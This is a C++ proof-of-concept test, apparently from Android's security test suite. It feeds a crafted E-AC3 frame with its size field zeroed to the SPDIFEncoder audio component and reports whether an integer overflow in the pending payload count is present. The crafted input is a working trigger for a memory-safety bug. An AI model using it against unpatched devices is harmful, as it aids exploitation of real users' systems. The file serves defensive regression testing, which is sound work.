76 lines
2.3 KiB
C++
76 lines
2.3 KiB
C++
/**
|
|
* Copyright (C) 2022 The Android Open Source Project
|
|
*
|
|
* Licensed under the Apache License, Version 2.0 (the "License");
|
|
* you may not use this file except in compliance with the License.
|
|
* You may obtain a copy of the License at
|
|
*
|
|
* http://www.apache.org/licenses/LICENSE-2.0
|
|
*
|
|
* Unless required by applicable law or agreed to in writing, software
|
|
* distributed under the License is distributed on an "AS IS" BASIS,
|
|
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
|
* See the License for the specific language governing permissions and
|
|
* limitations under the License.
|
|
*/
|
|
|
|
#include <stdlib.h>
|
|
#include <audio_utils/spdif/SPDIFEncoder.h>
|
|
#include "../includes/common.h"
|
|
|
|
// Taken as a reference from audio_utils/tests/spdif_tests.cpp "MySPDIFEncoder"
|
|
class PocSPDIFEncoder : public android::SPDIFEncoder {
|
|
public:
|
|
|
|
explicit PocSPDIFEncoder(audio_format_t format)
|
|
: SPDIFEncoder(format) {
|
|
}
|
|
|
|
PocSPDIFEncoder() = default;
|
|
|
|
size_t getBurstBufferSizeBytes() const {
|
|
return mBurstBufferSizeBytes;
|
|
}
|
|
|
|
size_t getByteCursor() const {
|
|
return mByteCursor;
|
|
}
|
|
|
|
android::FrameScanner *getFramer() const {
|
|
return mFramer;
|
|
}
|
|
|
|
size_t getPayloadBytesPending() const {
|
|
return mPayloadBytesPending;
|
|
}
|
|
|
|
ssize_t writeOutput(const void*, size_t numBytes) override {
|
|
mOutputSizeBytes = numBytes;
|
|
return numBytes;
|
|
}
|
|
|
|
size_t mOutputSizeBytes = 0;
|
|
};
|
|
|
|
int main() {
|
|
PocSPDIFEncoder encoder(AUDIO_FORMAT_E_AC3);
|
|
|
|
// Beginning of the file channelcheck_48k6ch.eac3 with frame size
|
|
// forced to zero
|
|
uint8_t buf[] = { 0x0B, 0x77, 0x00, 0x00, 0x3F, 0x85, 0x7F, 0xE8, 0x1E,
|
|
0x40, 0x82, 0x10, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03,
|
|
0xFC, 0x60, 0x80, 0x7E, 0x59, 0x00, 0xFC, 0xF3, 0xCF, 0x01, 0xF9,
|
|
0xE7 };
|
|
encoder.write(buf, sizeof(buf));
|
|
|
|
size_t bufferSize = encoder.getBurstBufferSizeBytes();
|
|
|
|
// If vulnerability is present, 'mPayloadBytesPending' will be assigned
|
|
// a large overflowed value
|
|
size_t pendingBytes = encoder.getPayloadBytesPending();
|
|
|
|
// 'mBurstBufferSizeBytes' shouldn't be lesser than 'mPayloadBytesPending',
|
|
// this will happen if 'mPayloadBytesPending' holds a overflowed value
|
|
return (bufferSize < pendingBytes) ? EXIT_VULNERABLE : EXIT_SUCCESS;
|
|
}
|